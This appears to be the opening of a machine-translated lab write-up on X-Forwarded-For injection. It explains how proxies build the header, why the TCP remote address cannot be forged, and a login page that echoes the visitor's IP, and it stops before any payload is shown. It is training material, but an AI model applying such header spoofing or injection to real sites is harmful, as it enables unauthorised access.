Mozi - X-FORWARDED-FOR injection vulnerability combat

X-FORWARDED-FOR

First, X-Forwarded-For HTTP is an extension header. HTTP / 1.1 (RFC 2616) protocol does not define it, which is the beginning of the Squid cache agent introduced by the software used to represent the HTTP requester real IP. Today it has become the de facto standard, widely used in major HTTP proxy, load balancing, forwarding services, and written RFC 7239 (Forwarded HTTP Extension) standard being.

XFF content from "comma + space" composed of multiple parts separated, the beginning is the end furthest away from the service device IP, then IP devices per agent.

If a request arrives before the HTTP server, through three agents Proxy1, Proxy2, Proxy3, IP respectively IP1, IP2, IP3, users real IP is IP0, then in accordance with XFF standard, the server will eventually receive the following message:

X-Forwarded-For: IP0, IP1, IP2

Proxy3 Direct Connect server, it will give XFF additional IP2, indicating that it is helping Proxy2 forwarding the request. The list does not IP3, IP3 can be obtained by Remote Address field on the server. We know that HTTP connection-based TCP connections, HTTP protocol does not have the concept of IP, Remote Address from the TCP connection, and indicates the establishment of TCP IP device connected to the server, in this case is IP3.

Remote Address can not be forged, since the establishment of the HTTP request TCP connection requires three-way handshake, if forged source IP, TCP connection can not be established, there will be no more behind. Remote Address acquisition of different languages in a different way, for example, is php $_SERVER["REMOTE_ADDR"]。

Enter the site found that only a login screen, enter any user name and password to log an error pop-up visit ip.